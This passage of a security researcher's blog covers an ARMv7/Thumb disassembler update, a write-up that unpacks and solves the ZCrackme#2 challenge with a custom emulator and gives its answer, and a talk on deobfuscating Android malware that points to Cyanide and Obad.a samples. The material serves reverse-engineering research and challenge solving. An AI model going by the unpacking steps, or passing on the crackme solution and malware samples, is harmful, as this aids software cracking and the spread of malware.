Dirkjan Email Feed is at your own responsibility. I do not intend
to damage Veronica in any way.

That’s all, and have fun reading Dirkjan. Dirkjan is awesome :)

Darm Update – More ARMv7, More Thumb

Darm is an ARMv7 disassembler in C. This blogpost is just
a small update about the new stuff in darm over the past couple of
months, as there were some delays due to conferences and other stuff :)

Thumb support

Most notably, recently Darm has gained support for the Thumb instruction
set. Those of you familiar with ARMv7 know ARMv7 has two modes, namely, ARMv7
and Thumb. ARMv7 contains pretty much all the instructions you’d ever need,
but Thumb is a small subset of the most used ARMv7 instructions, encoded in
only 16 bits, whereas ARMv7 instructions are 32 bits in size. Needless to
say, Thumb allows for more compact code.

The API to disassemble Thumb instructions is as straightforward as the
equivalent function for disassembling ARMv7 instructions. Furthermore, the two
instruction set modes share the same data structure, darm_t, hence it is
easy to write generic analysis routines without having to worry
whether you’re analyzing ARMv7 or Thumb.

Currently, the C API looks roughly like the following. (Including the Thumb2
function, for more information on that, read further.)

#include <stdint.h>

typedef struct _darm_t {
    // ... decoded instruction fields (elided) ...
} darm_t;

// disassemble an armv7 instruction
int darm_armv7_disasm(darm_t *d, uint32_t w);

// disassemble a thumb instruction
int darm_thumb_disasm(darm_t *d, uint16_t w);

// disassemble a thumb2 instruction
int darm_thumb2_disasm(darm_t *d, uint16_t w, uint16_t w2);

ARMv7 Improvements and Bug Fixes

ARMv7 has mostly had some bug fixes and a couple of new instructions. Nothing
too spectacular, but it’s still improving as I find bugs and stumble upon new
instructions.

Coming up: Thumb2 support

Currently I’m working on getting support for the Thumb2 instruction set as
well. As the Thumb instruction set is fairly limited in the instructions it
can encode (its instructions are only 16 bits in size, rather than 32 bits),
there’s also the Thumb2 extension. Thumb2 features almost all (except for
maybe a handful) of the instructions which are also available in the ARMv7
instruction set, hence allowing the optimized Thumb instructions to be mixed
with Thumb2 instructions, which, like ARMv7 instructions, are 32 bits in size.

Having said that, if there are requests for instructions which you’d like to
see sooner rather than later, please do contact me. At first I aim to support,
let’s say, 90% of the binaries while keeping the amount of implemented
instructions to a “minimum.” That is, I’ll focus on the most used Thumb2
instructions at first, and go for the complete instruction set later.

Difference between ARMv7 and Thumb/Thumb2

A small explanation on ARMv7 vs Thumb/Thumb2.

When executing ARM instructions, an instruction will be executed as an ARMv7
instruction whenever its address is 4-byte aligned, and as either a Thumb or
a Thumb2 instruction, depending on its encoding, when the least significant
bit of the address is set (for example, as the target of a BX or BLX
instruction). That is, when the address is not 4-byte aligned, but instead
either addr+1 or addr+3 (with addr being a 4-byte aligned pointer), then the
instruction is decoded as being either Thumb or Thumb2.
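A minimal Python sketch of the address rule above, as it applies to interworking branch targets. The helper name is hypothetical, and real cores also depend on which instruction performs the branch; a target with bit 0 clear but not 4-byte aligned is UNPREDICTABLE on hardware, and the sketch simply treats it as an error.

```python
def branch_target_mode(addr):
    """Return (instruction set, fetch address) for an interworking branch target."""
    if addr & 1:
        # Bit 0 set: Thumb state; instructions are fetched with bit 0 cleared,
        # so addr+1 fetches from addr and addr+3 fetches from addr+2.
        return "thumb", addr & ~1
    if addr & 3:
        raise ValueError("ARM targets must be 4-byte aligned")
    return "arm", addr


for target in (0x8000, 0x8001, 0x8003):
    mode, fetch = branch_target_mode(target)
    print(hex(target), mode, hex(fetch))
```

The Thumb-or-Thumb2 decision is then made per instruction from the first halfword fetched at that address.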

The instruction is either decoded as Thumb or Thumb2 depending on a couple of
the most significant bits. When decoded as Thumb, one 16 bit word is fetched
and executed. When decoded as Thumb2, a second 16 bit word is fetched and the
instruction is decoded as if it were a 32 bit word.

In the relevant lines of darm’s code we can see the comparison of the
upper 5 bits of the first 16 bit word. When the upper five bits equal either
b11101 (binary 11101, or 29 in decimal), b11110, or b11111, then it is a
Thumb2 instruction. Otherwise it’s a Thumb instruction.
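The same upper-five-bits test, written as a Python sketch that splits a stream of 16-bit words into one-word Thumb and two-word Thumb2 instructions. This is an illustration of the rule, not darm’s code; the helper names are hypothetical. The sample words are MOVS r0, #1 (0x2001), a BL (0xF000 0xF800) and a branch to itself (0xE7FE).

```python
def is_thumb2(first_halfword):
    """True if this halfword starts a 32-bit Thumb2 instruction."""
    return (first_halfword >> 11) in (0b11101, 0b11110, 0b11111)


def split_thumb(halfwords):
    """Group 16-bit words into Thumb (1 word) and Thumb2 (2 words) instructions."""
    out, i = [], 0
    while i < len(halfwords):
        if is_thumb2(halfwords[i]):
            if i + 1 >= len(halfwords):
                raise ValueError("truncated Thumb2 instruction at end of input")
            out.append((halfwords[i], halfwords[i + 1]))
            i += 2
        else:
            out.append((halfwords[i],))
            i += 1
    return out


print(split_thumb([0x2001, 0xF000, 0xF800, 0xE7FE]))
```

Each one-word tuple would then go to darm_thumb_disasm(d, w) and each two-word tuple to darm_thumb2_disasm(d, w, w2).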

Also note that at the moment there are two separate functions to disassemble
Thumb and Thumb2 instructions, but don’t worry, in the future there’ll be a
nice wrapper around them :)


For questions etc, you know where to find me.

Solving ZCrackme#2: A Custom Emulator Approach

Due to my non-existent experience with using gdb under ARMv7, I decided to
solve this challenge (the ZCrackme #2 Challenge) using a minimal
ARMv7 emulator
based on my ARMv7 disassembler. (The original
challenge can be found here.)

ZCrackme#2 Challenge

The binary itself is fairly interesting. It has a similar structure to the
first ZCrackme challenge (not sure if there’s a blogpost about this one
though.) Basically the ELF header is messed up, sections are missing, and the
Entry Point points to a page filled with zeroes.


Upon further inspection, using readelf -a zcrackme2, we find that the binary
features the so-called preinit-array, init-array, and fini-array dynamic
sections. These dynamic sections in fact represent a table of function
addresses which are being called right before calling the real Entry
Point (in the case of preinit-array and init-array) and called after
calling the real Entry Point (in the case of fini-array.)

Looking up the various virtual offsets using IDA Pro, we find that only the
init-array points to a real address, loc_B0D8. (The other table arrays,
preinit-array and fini-array, are filled with zeroes and -1’s, which are
nops – as in, these are not really called.)
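Given the raw bytes of one of these arrays (located via the DT_INIT_ARRAY and DT_INIT_ARRAYSZ entries that readelf prints for the dynamic section), filtering out the entries that are never called is straightforward. A Python sketch, assuming a 32-bit little-endian ARM binary as here; the helper name and sample bytes are hypothetical.

```python
import struct


def init_array_targets(data):
    """Function addresses in a 32-bit little-endian (pre)init/fini array.

    Entries of 0 and 0xffffffff (-1) are skipped, as they are not called.
    """
    count = len(data) // 4
    entries = struct.unpack("<%dI" % count, data[:count * 4])
    return [e for e in entries if e not in (0, 0xFFFFFFFF)]


# Hypothetical array contents: -1, the real routine, and a terminating 0.
sample = struct.pack("<3I", 0xFFFFFFFF, 0xB0D8, 0)
print([hex(a) for a in init_array_targets(sample)])
```

Only one address survives the filter, matching what IDA Pro shows for this crackme.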

We conclude that the actual entry point, or, the code that will be executed
first, is located at this (loc_B0D8) address. From analyzing this routine
in IDA Pro, we see
some sort of decryption loop which overwrites some memory. Finally, after
executing said decryption loop, an interesting system call is performed,
namely #0xf0002. We find that this system call represents __clear_cache
(the ARM-specific cacheflush system call).


Basically, before the decrypted code can be executed, the instruction cache
first has to be flushed for that particular address range, so that the CPU
executes the newly written code rather than stale instructions that are still
in the cache.
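
In an emulator, this is the natural place to hook: every time the cacheflush system call fires, the freshly decrypted range is known. Below is a minimal sketch of such a hook, assuming a hypothetical emulator that passes registers as a dict and the ARM EABI convention (syscall number in r7, arguments in r0 to r2); the class name is made up for illustration, and an OABI binary would encode the number differently.

```python
# ARM-private syscalls start at __ARM_NR_BASE = 0x0f0000;
# cacheflush is __ARM_NR_BASE + 2.
ARM_NR_CACHEFLUSH = 0xF0002


class SyscallTracker:
    """Hypothetical hook an emulator would call on every svc instruction."""

    def __init__(self):
        self.flushed_ranges = []

    def on_syscall(self, regs):
        if regs["r7"] != ARM_NR_CACHEFLUSH:
            return False
        # cacheflush(start, end, flags): end is treated as exclusive.
        self.flushed_ranges.append((regs["r0"], regs["r1"]))
        regs["r0"] = 0  # report success back to the emulated program
        return True


tracker = SyscallTracker()
regs = {"r0": 0xB000, "r1": 0xB400, "r2": 0, "r7": ARM_NR_CACHEFLUSH}
tracker.on_syscall(regs)
print([(hex(s), hex(e)) for s, e in tracker.flushed_ranges])  # [('0xb000', '0xb400')]
```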

This trick (decrypting code and then clearing the cache) is performed a total
of five times in this crackme.

So, having cleared the cache, the execution flow of the crackme now ends up in
the decrypted code, which, in turn, performs some more rounds of decryption.

Code Decryption

As mentioned, the crackme overwrites memory of the ELF file a total of five
times. One of these “decryptions” in fact zeroes the first 100 bytes of the
ELF header. As our goal is to dump a decrypted version of the crackme binary,
this ELF header corruption does not help us (as IDA Pro wouldn’t understand
the binary anymore.)

Reconstructing a Decrypted Binary

As each decryption is followed by clearing the cache, we dump a new binary
every time the cache is cleared. We do this by applying the changes to a copy
of the original binary: we read the decrypted data from emulator memory and
write it over the corresponding bytes in our copy of the original binary. We
do this for each decryption, except for the one iteration where the ELF header
is zeroed out. (Note: the __clear_cache system call takes the start address as
its first parameter and the end address as its second parameter, hence it is
trivial for us to find out which chunks of memory have been decrypted.)
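
The patching step could be sketched as follows. This is a hypothetical helper, not the actual script: it assumes a single loadable segment maps virtual addresses to file offsets, a read_mem(addr, size) callback supplied by the emulator, and it treats the cacheflush end address as exclusive. The 100-byte header_size default follows the header-zeroing pass described above and is an assumption.

```python
def apply_decrypted_range(image, read_mem, start, end,
                          seg_vaddr, seg_offset, header_size=100):
    """Copy emulator memory [start, end) over the matching bytes of `image`,
    a bytearray copy of the original file.

    Virtual addresses map to file offsets through one loadable segment:
    offset = vaddr - seg_vaddr + seg_offset. A range starting inside the
    first `header_size` file bytes is skipped, so the pass that zeroes the
    ELF header never reaches the dump. Returns True if the range was written."""
    file_start = start - seg_vaddr + seg_offset
    file_end = end - seg_vaddr + seg_offset
    if file_start < header_size:
        return False
    if file_end > len(image):
        raise ValueError("range extends past the end of the file image")
    image[file_start:file_end] = read_mem(start, end - start)
    return True


# Fake 256-byte file and emulator memory mapped at 0x8000 (illustrative only).
image = bytearray(256)
memory = bytes(range(256))


def read_mem(addr, size):
    return memory[addr - 0x8000:addr - 0x8000 + size]


print(apply_decrypted_range(image, read_mem, 0x8080, 0x8090, 0x8000, 0))  # True
print(apply_decrypted_range(image, read_mem, 0x8000, 0x8064, 0x8000, 0))  # False
```

Mapping through one segment keeps the sketch short; a binary with several PT_LOAD segments would need a per-segment lookup.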

Scripting the Emulator

The script I used for this, although a bit messy, dumps the binary a couple
of times, which results in the final binary we’re interested in. The unpacked
binary can be found here. (Note that this unpacked binary may be inaccurate
with regard to global variables etc. that have been updated during runtime but
are not reflected in this version of the binary.)

Having successfully dumped the unpacked binary, it is now time for some static
analysis on this binary. Do note that our emulator should run fine on both
Windows and Linux (with a 32-bit Python installed, that is.)

The actual Crackme

Looking through the dumped binary, we find ourselves looking at sub_87B4,
which is the function where the real stuff is happening (argc/argv parsing,
that is.)

There are a couple of odd text messages which are printed whenever incorrect
information is entered on the command line. Finally, we find some interesting
function calls: one to sub_8638, which seems to decrypt the string buffer
found at byte_9C35, and one to another function which performs a custom
strcmp() against the argument given on the command line.

The string at byte_9C35 is decrypted by xor’ing it with 0x0d (into a buffer
on the stack, by sub_8638), resulting in the string ZenCracking. With that,
we’ve solved the challenge.
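
Single-byte XOR is its own inverse, so the same routine both encrypts and decrypts. A minimal sketch (xor_decode is a hypothetical name): the encrypted bytes below are derived from the known plaintext rather than copied from byte_9C35, and it assumes the key 0x0d is applied to every byte.

```python
def xor_decode(data, key=0x0D):
    """XOR every byte with a single-byte key; applying it twice is a no-op."""
    return bytes(b ^ key for b in data)


# Derived from the plaintext, not read from the binary.
encrypted = xor_decode(b"ZenCracking")
print(xor_decode(encrypted).decode())  # ZenCracking
```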


If you have a working gdb setup for ARMv7, this challenge is probably pretty
easy (i.e., step through the various decryption iterations and try to find the
custom strcmp.) However, I had fun implementing the simple ARMv7 emulator,
which is in fact pretty tricky, with all the conditional stuff going on.

Now for a harder crackme? Let’s hope the next one does not involve xor
“encryption” :p Zimperium’s response, however, was that getting as far as the
xor decryption already shows enough knowledge and understanding of ARMv7, and
I agree :)

Automated Deobfuscation of Android Applications

During AthCon 2013 last week I talked about Automated Deobfuscation
of Android Applications and Malware. In particular, this presentation
focused on using automated deobfuscation tools to speed up the analysis of
third-party applications which have been obfuscated.
Click here for the slides.
The cyanide and obad.a samples discussed in the presentation can be found
here (password: infected.)

The Dexguard Scripts

At the moment the dexguard scripts focus on deobfuscating all obfuscated
strings and reconstructing a new dex file. As you will quickly see when
analyzing the _undexguard.dex files (explained further in the samples
section), this is far from complete deobfuscation. However, it gives you a
good head start when analyzing a sample. (And it’s a work in progress.)

The tools?

For now I have, unfortunately, decided to keep the code private. I’m
considering setting up a deobfuscation website later, where one can upload
a sample and download the deobfuscated sample a few seconds later.

Please do let me know if you (or your company) are interested in such a
service. You know where to contact me.

The Samples

A brief explanation of the provided samples.

Cyanide Sample

Cyanide.dex is a root exploit by Justin Case.

  • cyanide_original.dex is the original Cyanide binary
  • cyanide_dexguard.dex is a Dexguarded version of cyanide_original.dex
  • Running unchina.py on cyanide_dexguard.dex gives us cyanide_unchina.dex
  • Running our dexguard scripts on cyanide_unchina.dex gives us cyanide_undexguard.dex

Note: the dexguard version used for this sample is the second-to-last one;
however, our framework supports the latest version as well.

Obad.a Sample

Obad.a has been described as “the most sophisticated Android Trojan.”

  • obad_original.dex is the original obad.a binary
  • We get obad_undexguard.dex after running our dexguard scripts on obad_original.dex

Note: obad_undexguard.dex will not run on an emulator or a real device due
to the way it’s built. (The cyanide_undexguard.dex, however, should work.)
Even though it doesn’t run, JEB loads the undexguarded file just fine,
so it’s mostly useful for analysis.

Pintool and Z3 Introduction

I’ve posted an introduction to Pintool and one to Z3 on the blog of our CTF team, De Eindbazen.

And, yes, these actually provided us with results!

Pintool Introduction: http://eindbazen.net/2013/04/pctf-2013-hypercomputer-1-bin-100/

Z3 Introduction: http://eindbazen.net/2013/04/pctf-2013-cone-binary-250-2/